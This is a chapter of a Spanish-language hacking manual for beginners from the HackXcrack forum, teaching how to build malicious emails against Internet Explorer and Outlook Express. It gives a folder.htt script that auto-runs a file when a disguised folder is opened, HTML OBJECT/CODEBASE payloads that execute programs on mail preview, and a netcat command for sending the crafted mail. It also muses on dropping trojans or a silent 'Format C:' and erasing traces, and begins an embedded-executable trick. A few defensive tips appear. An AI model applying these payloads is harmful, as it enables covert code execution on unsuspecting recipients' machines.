Foro de HackXcrack

PRACTICA 14. Correos maliciosos (Por HxC Mods-Adm)

En esta práctica vamos a explotar alguna de las vulnerabilidades descubiertas para Internet Explorer y
Outlook Express, adaptando y modificando varios de los agujeros de seguridad descubiertos por Georgi
Gunisnki y de Juan Carlos García Cuartango. ¿No sabes quienes son?, pues lo primero que te
recomiendo es que introduzcas esos nombres en algún buscador, google, y prepárate con las respuestas
que se encuentren

Para describir, utilizar y poner ejemplos detallados de cada uno de los bugs que estos señores (hay más)
podríamos elaborar otro libro completito, de momento sólo vamos a utilizar alguno, que son:

• Ejecución de archivos al abrir una carpeta: Si, Si, has leído bien con sólo abrir una carpeta
podemos obligar a nuestro Windows a ejecutar algo que ya tenga instalado...

• Ejecutar archivos (que ya estén en nuestro equipo): con sólo recibir un e-mail, siempre y
cuando se tenga activada la vista previa de Outlook, el “infeliz” destinatario abra el correo.

• Enviar un e-mail “empaquetando” un archivo ejecutable, de forma que éste se ejecute nada
más recibirlo o al abrirlo, o sea, como el caso anterior pero sin necesidad de que el archivo
exista en la máquina víctima.

Podría seguir, e-mail que “camuflan” archivos ejecutables en ficheros de texto, vulnerabilidades
especiales para Word, Excel, Access, PowerPoint, etc., e-mail que introducen virus, troyanos y uno de los
que más me gustan:

Enviar un mail para que cuando el destinatario lo vea o lo abra, me envíe otro a mi con su IP,
Contraseñas, Nombre de la máquina, etc. además se pueden instalar troyanos (indetectables por
los mejores antivirus) para que se pueda obtener el control remoto de del equipo. ¡CASI NADA!

Seguro que estas pensando... “por que no empiezas por esto último y te olvidas de lo anterior” o a lo
mejor piensas “y eso no lo vas a explicar....”

El objeto de estos escenarios es que te des cuenta de lo importante que es el estar al día, el seguir “al pie
de la letra” los consejos expuestos en este libro:

No dejar nada al azar

Ser precavidos
Configurar “como Dios manda” todos los programas que usas
Actualizar con los parches de seguridad tus programas
Estudiar.... y aun así siempre aparecerá nuestro “amigo Georgi” con nuevos métodos.

Si con alguien sueña Bill Gates y su equipo de seguridad es con “este tipo”, es el Freddy Cruger de
Microsoft y su película “Pesadilla en Windows Street”.

Aunque en este capítulo se explotan los agujeros desde Outlook, con pocos cambios y algo de
imaginación podemos hacer lo mismo con una página web, de forma que por sólo visitar nuestra página
podemos “colar” un ejecutable a alguien, esto sí que no lo explicaré, me niego, además siempre podemos
ir a la carga del “mamón” que puso esa página, si nos enteramos, claro...

Si yo supiera que quien está leyendo esto tiene unos mínimos conocimientos de programación HTML,
JavaScript, VBScript, no digamos nada si le añadimos C (Visual C++ o Borland C++) esta práctica se
terminaría en la próxima página, como seguro que no es así, voy a ir muy despacito, no pretendo explicar
línea por línea todo lo que escribo, pero en alguna de ellas no te quedará más remedio que tener FE y
confiar en mi si no conoces nada de programación.

Hombre, siempre hay aplicaciones gráficas que facilitan todos estos conceptos, pero créeme no hay nada
tan satisfactorio que saber “cómo se ha hecho” y cómo se puede adaptar a cada caso, lo del principio:

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 54
 Foro de HackXcrack

Aprender + Adaptar = Superar.

Ya se que W98 es todavía el Sistema Operativo más popular y más instalado actualmente, por lo menos
en España, estas prácticas van orientadas a NT/W2K/XP, con algún cambio funcionarán en otras
versiones de Windows.

“♫♫♫ Mírala Cara a Cara que el la primera... ♫♫♫” (Gracias... Cyruxnet)

Ejecutar un archivo al abrir una carpeta, pero ¿No estamos hablando de e-mail, Internet...? Si no hay
carpetas!!.

Claro, la idea es “fabricar” una carpeta que contenga un archivo o algo que queramos que se ejecute
cuando la víctima abra EL ARCHIVO ADJUNTO AL RECIBIR EL E-MAIL.

Seguro que estás pensando: “basta con no abrir el archivo adjunto”, efectivamente, si no se abre no pasa
nada, pero: ¿Quién duda de la inocencia de una carpeta?, Lo malo son sus contenidos, si el destinatario
desconfía del correo recibido, posiblemente jamás abrirá un archivo llamado mirame.exe que le vino
adjunto a un correo, pero seguro que no desconfiará al acceder a una carpeta que le hayan enviado por
correo que se llame Productos, Ofertas, Información, o lo que se te ocurra.

Preliminares:

Para que esta práctica funcione se deben cumplir ciertos requisitos, ya verás que no son nada raros:

• La Organización de los contenidos de carpetas debe estar en automática o por nombre,

prácticamente todo el mundo la tiene así., es la organización por defecto.

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 55
 Foro de HackXcrack

• El escritorio y/o la visualización de las carpetas y sus contenidos debe ser como Página Web
o tener Activado Active Desktop. Casi todo el mundo lo tiene así, me atrevería a afirmar que
el 99,99% tanto ésta condición como la anterior, así que, de momento no estamos pidiendo
nada raro y no se necesita NADA MAS.

Bueno vamos por partes, primero a conocer como trata Windows a las carpeta, sus contenidos, los iconos,
en fin todo lo que vemos y cómo lo vemos cuando se accede a una carpeta.

El secreto está en un tipo de archivos de extensión .htt, dentro de ese archivo se guardan las
configuraciones personalizadas que el usuario crea para sus carpetas.

¿Dónde está ese archivo?, Bueno pues eso depende, seguro que piensas “ya estamos...”, depende del
Windows que utilizas y depende de la carpeta que utilizas, ¿lógico no?

Como estoy hablando de NT/W2K/XP los archivos de configuración *.htt se guardan en:

C:\winnt\web

Siempre y cuando sea C: y winnt la unidad y directorio de instalación de Windows.

Si accedemos a esa carpeta y le pedimos a Windows que muestre los archivos ocultos, por cierto, un
paréntesis:

¿Alguien sabe por qué de forma predeterminada Windows oculta las extensiones de los archivos
y no muestra el/los archivos o carpetas ocultas?

¿Alguien sabe que ventajas ofrece al usuario?

¿Alguien sabe que no se sabe como mostarlo...?

¿Alguien sabe....

Probablemente sea porque no estemos preparados para entender la diferencia entre un archivo
.bat, .exe, .com .doc,... y lo de ocultar unos sí y otros no, debe ser por aquello de que “ojos que
no ven...” y así evitar el cuadro maniaco-depresivo de un usuario ante el profundo
desconocimiento de lo que está viendo, ¿para qué va a ver algo que jamás entenderá su corta
mente...?. Vale, no sigo..., digo sí sigo, con lo de antes...

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 56
 Foro de HackXcrack

“Dile a tu Windows” que muestre extensiones, archivos ocultos y archivos del sistema y verás el
contenido de la carpeta %Systemroot%\Web, el que nos interesa es Folder.htt .

Folder.htt

Pese a esa extensión tan extraña, se trata de un archivo ejecutable, espera, todavía no hagas doble clic,
realmente es un archivo cuyo contenido se ejecuta. ¿Cuándo? Pues cuando el usuario abre una carpeta.

Es decir, que si modificamos cualquier cosa de la carpeta Web se modificará la forma en que se abren el
resto de carpetas de Windows, por ejemplo haz lo siguiente:

Copia un fichero *.bmp (P.e..del escudo de tu equipo de fútbol favorito) y pégalo en esta carpeta
con el nombre wvleft.bmp, verás que a partir de ese momento “en tus ventanas” al abrir las
carpetas el dibujo que aparecía en la zona superior izquierda ha cambiado por el bmp que
pusiste, abre varias carpetas, MiPc, lo que quieras y verás que “el escudo de tu equipo” preside la
ventana.

Lo que nos interesa es cómo hacer esto mismo pero con dos variantes:

o Sólo debe ocurrir con una carpeta determinada y no con todas

o Lo que debe hacer no es cambiar el gráfico con que se visualiza la carpeta
sino EJECUTAR un archivo.

Para la primera variante nos basta con usar Windows y resolver el problema,

La segunda variante necesita “manipular” el fichero folder.htt de la carpeta elegida, IMPORTANTE no

modifiques el archivo folder.htt de la carpeta \winnt\web con lo que voy a explicar a continuación o cada
vez que abras cualquier carpeta de tu PC se ejecutará un archivo, bueno puede no ser tan mala idea si lo
que quieres es “fastidiar a alguien” que no sepa como deshacer el entuerto...pocos, muy pocos sabrán
como hacerlo, ni te cuento si encima cambiamos los permisos NTFS del archivito y permitimos sólo a los
administradores modificarlo y a los demás sólo leerlo.

Crearemos una carpeta en la unidad C: con el nombre Productos, después abre la carpeta (estará vacía
claro) y en el Menú de Ver selecciona la opción Personalizar carpeta..., pulsa siguiente, siguiente,
siguiente y Finalizar, es decir, simplemente déjate llevar por el asistente y NO MODIFIQUES ninguna
de las opciones que te propone, ahora aparecerán, como por arte de magia, una carpeta y un archivo:

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 57
 Foro de HackXcrack

El archivo desktop.ini, contiene entre otras cosas:

El lugar donde debe encontrar el archivo folder.htt correspondiente a la personalización de ésta

carpeta, si no lo ves es que no has seguido mis pasos, debes pedir a Windows que muestre
archivos y extensiones ocultas (Herramientas-Opciones de carpeta-Ver...)

La carpeta Folder Settings, contiene entre otras cosas:

El archivo folder.htt buscado (fíjate que hay más archivos, pero sobretodo nos interesa éste)

Ahora vamos a copiar y pegar en nuestra carpeta Productos el archivo que queremos que se ejecute
automáticamente, no vamos a ser malos, vamos a copiar la calculadora de Windows, el archivo calc.exe
que deberá estar en \winnt\system32\calc.exe y lo pegamos en Productos, ¿Sabes copiar y pegar no?

Una vez copiado: le cambiaremos el nombre por el de aacalc.exe (ahora entenderás por qué), si lo
deseas puedes poner más cosas dentro de la carpeta para despistar, es decir, puedes poner la verdadera
lista de precios de una hoja Excel, un archivo Word con sus descripciones, imágenes, lo que quieras, lo
único verdaderamente importante es que el archivo que queramos ejecutar DEBE SER EL QUE
APAREZCA EL PRIMERO, hombre no te pases, recuerda que luego lo vamos a enviar por mail y
nuestro “amigo” tampoco va ha recibir un archivo de 15 Mb, no te pases. Podría quedar algo así:

El bug que vamos a utilizar ejecutará el primer archivo o carpeta que encuentre al abrir Productos, por
tanto tenemos varios problemas:

1º ) El primer objeto que aparece dentro de productos es la carpeta Folder Settings y no

aacalc.exe que es lo que queremos que se ejecute.

2º) El archivo folder.htt está dentro de Folder Settings, y no basta con “pasarlo” directamente a
productos sin más.

3º) Si eliminamos Folder Settings destrozaremos la visualización de la carpeta o se producirán

errores y borraremos la personalización

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 58
 Foro de HackXcrack

Soluciones:

Lo primero editar el archivo desktop.ini, y vamos a cambiar la ruta de dónde dice que se encuentra el
fichero folder.htt, poniendo en su lugar la ruta de la propia carpeta Productos, a por ello:

Sólo he resaltado lo que tienes que borrar del fichero desktop.ini, la línea en cuestión ha de quedar así:

PersistMoniker=file:// Folder.htt

Guarda el archivo, y no te asustes si desaparece el aspecto anterior de la ventana, o mejor, asústate,

pulsa F5 para actualizar la ventana, ¿Qué pasa?

Pues simplemente que al modificar el archivo que le indicaba a Windows dónde debe buscar las
propiedades de esta carpeta, el archivo folder.htt, simplemente no lo encuentra (porque no está ahí) y nos
elimina la presentación para esta ventana.

Ahora lo que tienes que hacer es abrir Folder Settings y copiar TODO su contenido a la carpeta padre
que es Productos, después pulsa F5 (un par de veces) y verás que todo vuelve a la normalidad...

En estos momentos ya no nos sirve la carpeta Folder Settings, la borramos y nuestro archivo aacalc.exe
será el primer objeto de la carpeta ¡¡POR FIN!!

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 59
 Foro de HackXcrack

No me digas más. en tu PC el archivo aacalc.exe no es el primero, pues botón derecho-organizar iconos-

por nombre y ya está. (Recuerda que era una de las condiciones para que todo esto funcione)

Ya estamos en disposición de manipular el archivo folder.htt de la carpeta Productos, ya tenemos nuestro

archivo desktop.ini apuntando en la ruta correcta y el archivo aacalc.exe (o el que queramos) el primero
de la lista, ahora el bug:

<script>
setTimeout("f()",2000);
function f() {
FileList.focus();
FileList.FocusedItem.InvokeVerb();
}
</script>

¿Qué “idioma” habla? ¿Cómo? ¿Qué esto? ¿Lo tengo que escribir? ¿Dónde? ¿Qué hace?

Si hubieses realizado el curso de VisualBasic o de Programación Internet o de Java en Nuevas

Tecnologías Madrid antes de leer esto, todas las preguntas anteriores las responderías tú solito.

Ahora es cuando viene lo que te decía antes:

Debes tener FE y confiar en lo que te digo, a menos que sepas programar en esos lenguajes.

Te lo voy a explicar sencillamente:

Es un programa o script que ejecuta una función llamada f() después de 2 segundos y pasado
ese tiempo, la función f() intenta abrir el objeto (pongamos archivo) que encuentre EN LA
PRIMERA POSICIÓN de la carpeta, en nuestro caso: el primer archivo es aacalc.exe

¿Por qué has dicho intenta abrir y no que abrirá? Pues porque si lo primero que hay en la lista es:

Una carpeta, abrirá una carpeta.

Un fichero de Word, abrirá Word con su archivo

Un vídeo, pues eso.

Si lo primero que hay no lo puede abrir, o nos pregunta o hace tonterías, a veces esas tonterías
son muy oportunas si lo que deseamos es aburrir a alguien.

Claro, claro, hay que escribirlo, qué te crees que los programas se cantan y se bailan, vamos a ver dónde
lo escribimos: en el archivo folder.htt de la carpeta Productos.

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 60
 Foro de HackXcrack

Abre el archivo folder.htt con el bloc de notas, para que no cometas errores, por si no sabes nada de
programación, debes incluir el bug en un sitio adecuado: La antepenúltima línea del código es un buen
sitio (antes de </body>), inserta una línea pulsando Enter, debes ver algo así:

Ahora escribe el script anterior, guarda las formas, la minúsculas en minúsculas, los tabulados, etc, no es
necesario pero el estilo siempre es importante, quedará así, yo te lo he resaltado para que no haya dudas:

Verifica la sintaxis del código, que todo esté en su sitio y bien escrito (así me gusta), y guarda los
cambios.
A partir de este momento cada vez que se acceda a la carpeta Productos, pasados 2 segundos se ejecuta
la calculadora (sólo una vez, no cada dos segundos), puede ocurrir que Windows informe de un contenido

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 61
 Foro de HackXcrack

activo que pueda ser peligroso, bla, bla,bla. Pero tanto como si se responde Si o No ya será tarde y el
archivo aacalc.exe se ejecutará

Los más espabilados os estáis preguntando si ese mensaje se puede evitar, si el fichero aacalc.exe se
puede ocultar, si la carpeta puede mostrar sólo la información que queramos, etc.

Pues claro, todo eso se puede hacer, eso sí, no ocultéis el archivo aacalc.exe mediante propiedades-
ocultar archivo por que entonces puede no ser el primero de la lista (todo depende de si se tiene activado
o no lo de mostrar archivos ocultos en el menú de herramientas), aparte que si el destinatario tiene
desactivada la casilla de No mostrar archivos ocultos, lo verá.

No te voy a contar nada de esto, ya sabes lo que dicen los monjes de saoiln, “nunca enseñes todo a tu
discípulo, déjale que lo descubra y será mejor que tú.”.

Si quieres practicar algo, usa estas líneas en lugar de sus equivalentes en el fichero folder.htt

<object id=Thumbnail classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2" tabIndex=-1>

</object>

<object id=FileList classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2" tabIndex=1>

</object>

Me gustaría que en lugar de que copies y sustituyas las líneas del fichero original por estas otras,
investigaras y buscaras por todas partes, qué significan, me doy cuenta es un problema grande, si lo único
que te interesa de este libro y de ésta práctica es copiar y pegar, ciertamente el libro te será útil, pero NO
APRENDERÁS NADA, serás un lamer, peor que eso, NO SERAS NUNCA NADA EN LA VIDA.

Empieza buscando en Internet eso de Thumbnail (prueba primero con un diccionario inglés-español y
averigua qué significa), Classid, investiga qué son todos esos números y letras, qué es un objeto, etc. es
decir, divide el problema en otros más pequeños y comprende..., pide ayuda, hay foros, tienes muchos
recursos, otras personas no tuvieron tanta suerte...

Imagina este fichero con el nombre aaa.bat

CD C:\productos
DEL Folder.htt
REN Folder.htt.bak Folder.htt
calc.exe
DEL calc.exe
DEL aaa.bat

Imagina que antes de manipular el archivo Folder.htt hicimos una copia del mismo con el nombre
Folder.htt.bak

Imagina que calc.exe es un virus, un troyano, o que es un Format C: “trucado” para que ni siquiera pida
el consentimiento al usuario (¡EH, QUE SE PUEDE HACER, VALE!)
Imagina que en lugar de ser un fichero aaa.bat es aaa.com ó aaa.exe

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 62
 Foro de HackXcrack

Imagina que cuando la victima abre la carpeta NO VE NADA, pero se ejecuta TODO y luego se
BORRA

Imaginando, Imaginando ahora te toca a ti...

Bien, nos falta enviar por e-mail la carpeta, seguro que algunos estáis ya en ello, hala, hala, seguid....

LAS CARPETAS NO SE PUEDEN ENVIAR COMO FICHEROS ADJUNTOS, antes tenemos que
comprimirlas y enviar el ZIP o lo que hayamos generado, otra vez, estáis ya en ello, NO FUNCIONARA.

El motivo es porque winzip ELIMINA la personalización de la carpeta, que te creías que cuando se
comprime un archivo no se pierde información y lo que hace el compresor es “apretujar” los datos en
menos espacio, pues mira ya tienes algo que pensar...

Al eliminar la personalización, se elimina nuestro archivo folder.htt, ¡Qué lástima!, pero... Sólo lo hace
de la primera carpeta que encuentra, es decir que si nuestra carpeta Productos la metemos dentro de otra,
por ejemplo que se llame Ofertas de Navidad 2002, winzip destruirá la personalización (si la tiene) de
Ofertas de Navidad 2002..., pero no de Productos, lo único es que nuestro “amigo” debe abrir dos
carpetas para que se ejecute automáticamente el archivo.

Otra solución es usar otro compresor diferente y probar, yo ya he probado con uno y acerté, ¿Cuál será?

Ni que decir tiene que será mucho mejor enviar un mail anónimo, mejor aún, empieza por enviártelo a ti
mismo, luego experimenta con conocidos, etc Adviértelos y no alardees de ello o terminarás por ser
olvidado por tus amigos y por tus enemigos, se humilde y continúa aprendiendo.

Una buena forma de poner en práctica tu curiosidad es, traspasar este ejercicio a otra versión de Windows,
prueba con 98, ME, XP, etc. haber sin consigues algo “por ti mismo”.

Poner remedio o evitar este ataque es difícil, muy difícil. Yo no conozco parches de seguridad para
evitar la ejecución del archivo, lo único que puedo darte son consejos preventivos:

Si eres administrador de una red puedes impedir que tus usuarios editen, cambien o accedan a los
archivos folder.htt mediante permisos NTFS bien configurados.

Puedes no utilizar la organización automática de los iconos, puedes no usar Active Desktop,
puedes impedir el acceso al menú de Personalizar Carpetas, etc. Para conseguir esto aplica
Directivas de Grupo adecuadas a la máquina local o a los usuarios del Dominio que
correspondan.

Si recibes un e-mail en el que hay una carpeta, siempre puedes abrir una sesión de MS-DOS
(cmd.exe) y examinar el contenido de la misma antes de abrirla desde Windows, de éste modo no
se lanzará el archivo ejecutable. ¿Ves como sí que sirve lo de la ventana de comandos? Pues
espera, que será una de tus mejores aliadas y una de las mayores fuentes de problemas....

Bueno como verás todos los consejos indicados son más de precaución y prevención para impedir el
golpe, en fin, aprovecha el contenido de esta práctica para “hacer el bien”. Por ejemplo se puede usar este
método para que en lugar de ejecutarse el archivo calc.exe, un virus, un troyano o algo malo, puedes
poner una página web, una presentación con PowerPoint, un vídeo, una Base de Datos, no se, algo que
sea útil para tu empresa-trabajo-amistades y que además de sorprender cumple una función didáctica y de
fácil ejecución.

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 63
 Foro de HackXcrack

“♫♫♫ Mírala Cara a Cara que el la segunda... ♫♫♫”

Vamos a enviar un mail que ejecute un archivo nada más leerlo o visualizarlo en la vista previa.

Preliminares:

• El destinatario debe usar Outlook Express y/o Internet Explorer

• El archivo a ejecutar debe existir en la máquina que abre el correo
• Debe estar permitida la ejecución de contenidos activos en la zona de seguridad de
Internet o en la zona donde aplica la seguridad Outlook, en algunas versiones de Outlook
y/o Explorer, ni siquiera es necesario.

Ahora el correo a enviar:

Aquí la explicación

Las ocho primeras líneas con los comandos smtp, tal y como ya se han explicado, acuérdate de cambiar el
destinatario y remitente.

Todo lo que está comprendido entre <HTML> y </HTML> es el mensaje que verá el destinatario con el
bug incluido.

Observa que se usa MIME y que el tipo de contenido es text/html, lo del juego de caracteres se eligió us-
ascii, no es muy importante, pero si sabemos que el destinatario es europeo, podíamos haber puesto otro,
por ejemplo: “iso-8859-1”, ya tienes otra cosa que investigar por tu cuenta o si quieres visita esta página:
http://nti.uji.es/docs/nti/ISO8859.html

Bueno si conoces HTML hay muy poco que explicar, realmente lo que estamos enviando es un mail
con formato HTML, ¿te acuerdas de lo que hablamos de ello, en este mismo capítulo?, es decir, es una
página web dentro de un correo. La página está definida entre las marcas <HTML> y </HTML>, lo que
quiere decir que si sustituyes lo que hay entre estos códigos HTML y copias o pegas el contenido de tu
página web u otra cosa, se enviará eso en formato HTML.

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 64
 Foro de HackXcrack

Para que éste correo malicioso funcione, lo que nunca debes borrar son las líneas, QUE ES EL BUG:

<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE='C:\winnt\system32\SOL.exe'>
</OBJECT>

<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE='C:\winnt\system32\calc.exe'>
</OBJECT>

El fichero maliciosoX.txt termina con un punto (.) y la orden quit, recuerda que es la forma de finalizar el
contenido de DATA para que el servidor smtp envíe el correo. Quit cierra la conexión con el mismo.

Vamos a explicar el Bug, no se muy bien quién fue el inventor, hay alguna rencilla entre ellos, así que
para no ofender a nadie no mencionaré a ninguno de los implicados.

El truco consiste en llamar a un objeto ActiveX (Object) con un parámetro CLSID que sea distinto de
cero, de tal forma que al interpretar eso Internet Explorer o nuestro Outlook, ejecuta el programa que se
le indique en CODEBASE.

Bueno ya has aprendido algo que te propuse en la práctica anterior <OBJECT>, efectivamente, al utilizar
este marcador dentro de HTML, script, etc se llama-ejecuta a un objeto de ActiveX, antes era el objeto
Thumbnail (espero que ya sepas que significa en castellano), Si seguimos así, en la próxima práctica
terminaré por explicar CLASSID, CLSID y al final será un curso de Programación, por cierto, si no sabes
nada de ello y te interesan estos temas vete pensando en aprender EN SERIO, eso sí, empieza por lo
sencillito, Visual Basic, HTML, lenguajes de Script, etc.

En la práctica, cuando el destinatario recibe este tipo de e-mail, se ejecutarán el-los archivos que se
indiquen después de CODEBASE, en nuestro caso el juego de cartas del solitario y la calculadora de
Windows, aunque como dice el texto del mensaje “Podría haber sido otra cosa...”

Es importante que indiques la ruta completa para alcanzar el archivo que queramos que se ejecute, de tal
modo, que si el destinatario no tiene Windows NT/2000 no funcionará, porque los archivos calc.exe y
sol.exe no están en winnt\system32, esta simpleza nos va haciendo entrever lo importante que es conocer
el Sistema Operativo que usa la víctima, este ejemplo puede ser modificado sencillamente para que se
ejecuten los archivos aunque no conozcamos su ubicación real, pero en otras ocasiones determinados
exploits, bugs y demás “utilidades” sólo funcionarán en determinados Sistemas Operativos y en
determinadas versiones de éstos, cuando llegue el momento explicaré como se puede detectar el Sistema
Operativo del equipo objetivo.

Ahora sólo nos queda saber cómo se envía esto, si te aplicaste la parte de cómo enviar un correo por
Telnet, no será ningún problema que puedas enviar éste, sólo debes cambiar los comandos SMTP mail
From:, To:, etc. para dirigir el envío a la dirección adecuada, EMPIEZA por enviártelo a ti mismo.

Te habrás dado cuenta que se ha metido el e-mail a enviar en un documento .txt y lo he llamado
maliciosoX.txt, ahora sólo debo encontrar la forma de canalizar el archivo a través de un servidor de
correo de tal forma que se vaya leyendo línea por línea el fichero maliciosoX.txt para que se puedan
interpretar los comandos SMTP. ¿No sabes cómo hacerlo? No me extraña, y no te preocupes hay
Administradores de Redes con importantes cargos y sueldos que no saben la décima parte de lo que tú
estás aprendiendo y si no te lo crees pregunta por ahí....

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 65
 Foro de HackXcrack

Para los que estéis pensando en copiarlo sin más y ponerlo dentro de Outlook
Suspensos
Para los que estéis pensando en enviar como archivo adjunto el fichero maliciosoX.txt
Deficientes
Para los que estés pensando en escribir “tal cual” todo lo de arriba vía Telnet
Aprobados.
Para los que estéis pensando que “tiene que haber algo que lo haga”
Notables
Para los que ya sepáis como hacerlo
3$%&3/8??7//!!”58$$&/(^w^^^^hhh^^

Vamos a ver, los dos primeros casos suspenden por razones obvias, no pasarán de ser unos lamers y se
limitarán a enviar este correo para fardar ante sus amistades, aunque para eso y aunque me pese, tendré
primero que enseñarles cómo se hace.

El que piense usar Telnet, lo enviará correctamente, pero hay que tener VALOR para “meter todo ese
churro” por la ventanita de telnet, SIN EQUIVOCARTE Y SIN BORRAR SI TE EQUIVOCAS, ellos
solamente aprueban, porque aunque sus ganas de conocer les hacen intentarlo todo, con lo poco que
conocen hasta ahora, posiblemente se quedarán allí, en el intento.

El que piense que existe algo que envíe este tipo de correo, seguramente ya estará buscando cómo y cual,
y ESO ES BUENO.

De los que ya saben cómo hacerlo, no digo nada. A ENVIARLO.

El problema que se nos presenta a la hora de enviar este correo es, que si lo pensamos hacer con Outlook,
como este programa no permite editar las cabeceras para “personalizar” el correo, no seremos capaces de
enviar el contenido HTML, así que soluciones:

1º) Podemos crearnos una página web en nuestro PC mediante FrontPage u otro editor cuyo
contenido o diseño incluya el bug, (desde las líneas <HTML>......</HTML>), después
seleccionamos la vista previa (se ejecutará en nuestro PC los programas indicados en
CODEBASE) y desde la vista previa, resaltamos y copiamos TODO (fíjate bien que al final
aparecerán “unos cuadraditos” que precisamente son los OBJECT a ejecutar.
SELECCIONALOS también, quedaría más o menos así:

Luego, nos vamos a Outlook y lo pegamos a directamente en el cuerpo del mensaje. Después
introduces la línea de asunto, Destinatario, etc y le das a enviar. Te aviso, NO PEGES el texto
HTML, sino el de la vista previa, por que sino lo que enviarás son los códigos HTML en texto
claro, no la página en sí.

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 66
 Foro de HackXcrack

2º) Podemos usar otro programa de correo que sí permita editar cabeceras, etc.
3º) Podemos usar otro Sistema Operativo como LINUX
4º) Podemos usar “alguna herramienta”, por ejemplo netcat
5º) Puedes usar tu imaginación y tus conocimientos para ampliar esta lista....

Ya que tenemos el archivo a enviar en el fichero maliciosoX.txt, podemos utilizar netcat para enviarlo, no
te voy a contar ahora qué es netcat, lo irás descubriendo poco a poco, porque es una utilidad
asombrosamente potente y versátil.

Usaremos netcat para poner a la escucha un equipo, para ejecutar archivos, para abrir puertos, para
obtener interactividad, etc. y ahora lo vamos a usar para enviar un e-mail, todavía tiene muchas más
utilidades, puede capturar paquetes de datos, escanear puertos TCP, UDP, bueno la lista es muy, muy
larga.

Todos los que trabajan en el mundo de las redes, seguridad, etc. conocen netcat, algunos sólo de oídas, lo
que haremos es entregar el archivo maliciosoX.txt y dárselo a netcat para que se comunique con el
servidor smtp elegido, abra el puerto 25 y envíe línea por línea el archivo, como si hubiésemos iniciado
una sesión telnet y nos pusiéramos a escribir el mensaje línea por línea.

Netcat debes usarla desde una ventana de comandos, así que a escribir:

C:\>type maliciosoX.txt | nc –vv –i 15 servidor.smtp.queuses 25

Asegúrate de incluir la ruta adecuada del fichero a enviar y de usar un servidor smtp correcto, esto es, si
tenemos netcat instalado en C:\netcat y el archivo maliciosoX.txt en C:\testmail, y si el servidor elegido
fuese mailhost.correo.com, la línea de comandos sería:

C:\>CD\netcat
C:\netcat> type c:\testmail\maliciosoX.txt | nc –vv –i 15 mailhost.correo.com 25

La opción –i 15, le indica a netcat que incluya un retardo en el envío, depende del servidor que hayas
elegido puedes necesitar o no esta opción e incluso variar el número, si no te funciona te darás cuenta
porque además de no recibir el mensaje (estamos suponiendo que nos lo enviamos a nosotros mismos), la
pantalla de comandos, se queda como esperando a que terminemos de escribir el mensaje...., si todo ha
ido bien, te indicará que el servidor aceptó el mensaje y que ha sido enviado, la pantalla izquierda
muestra un envío mediante netcat “colgado”, en la otra el envío fue correcto.

Sólo lo evitaremos este ataque configurando adecuadamente las zonas de seguridad tanto de Internet
Explorer como de Outlook Express, te recuerdo que, de igual forma que enviamos el correo, podríamos
haber diseñado una página web que sólo con visitarla se ejecuten los archivos descritos. Uuuy!

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 67
 Foro de HackXcrack

Bueno, siempre podemos “pasar” de utilizar Internet Explorer y/o Outlook, si seguimos tirando del hilo
terminaremos por dejar de usar Windows y como para otros clientes de correo, navegadores, sistemas
operativos, etc. existen otros bugs similares, al final dejaremos de usar los ordenadores ¿?

“♫♫♫ Mírala Cara a Cara que el la tercera... ♫♫♫”

Ya no canto más, no más sevillanas, ni más baile, lo prometo.

Vamos a realizar la misma práctica anterior, pero con una variación importante. El archivo que
queramos que se ejecute en el equipo destino NO HACE FALTA que lo tenga instalado, se lo vamos
a empaquetar en el mismo correo y cuando lo abra o lo pre-visualice, se EJECUTARA sin más.

Existen varios métodos para hacer esto, yo he elegido el que descubrió Juan Carlos García Cuartango y
para que lo puedas utilizar sin escribir mucho “un amigo argentino” me ha pasado una utilidad que nos
empaqueta y escribe el formato de correo que tenemos que enviar. Gracias de nuevo
Cyrux!!!,
ANTES de que instales y/o empieces a trastear con el ejecutable sploiter.exe ENTIENDE bien el bug y
otra serie de consideraciones que te voy a explicar, es decir, DEJA de trastear por ahora y lee
detenidamente, comprende y practica.

Como en los casos anteriores, este bug puede ser usado indistintamente dentro de una página web o
mediante un mail en formato html, por lo que no deja de ser bastante peligrosillo....

Desgraciadamente la web www.kriptopolis.com ha cerrado, como protesta a la intervención de la nueva

Ley de Seguridad de Internet, en ella se explicaba perfectamente en que consiste este agujero. Voy a
explicarlo de la mejor manera que soy capaz, créeme que es muy difícil y más en un libro.

El “misterio” viene determinado en la forma que IE ó OE interpreta el contenido de una página web o de
un e-mail en el que se incluye un archivo wav, NO TE CONFUNDAS:

No se trata de enviar un sonido

No se trata de adjuntar ningún fichero
No se trata de que sea una archivo de sonido de verdad

Consiste en algo así como, engañar al navegador o a Outlook para que en una cabecera:

Content-Type: audio/x-wav,

Se incluya un archivo ejecutable (no un sonido) para que cuando intente reproducir ese sonido, en su
lugar ejecute un el archivo .exe que le “endosaremos” como parte del contenido del mensaje.

Mediante esta técnica lograremos que se ejecute un archivo codificado en BASE 64 (Content-Transfer-
Encoding: base64), dentro de la misma página o correo, y sin necesidad de que el usuario lo acepte o
confirme.

Creo que debes leer varias veces los dos párrafos anteriores hasta que comprendas perfectamente la teoría

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 68
 Foro de HackXcrack

¿Ya?, pues vamos a explicar los nuevos conceptos que se introducen:

1º) Content-Type: audio/x-wav Es indicar a IE ó OE que “lo que viene” a continuación es un

sonido. Es lo mismo que Text/plain para los textos claros o que Text/html para los formatos
HTML como vimos antes.

2º) Content-Transfer-Encoding: base64, es indicar que “lo que viene” a continuación es “algo”
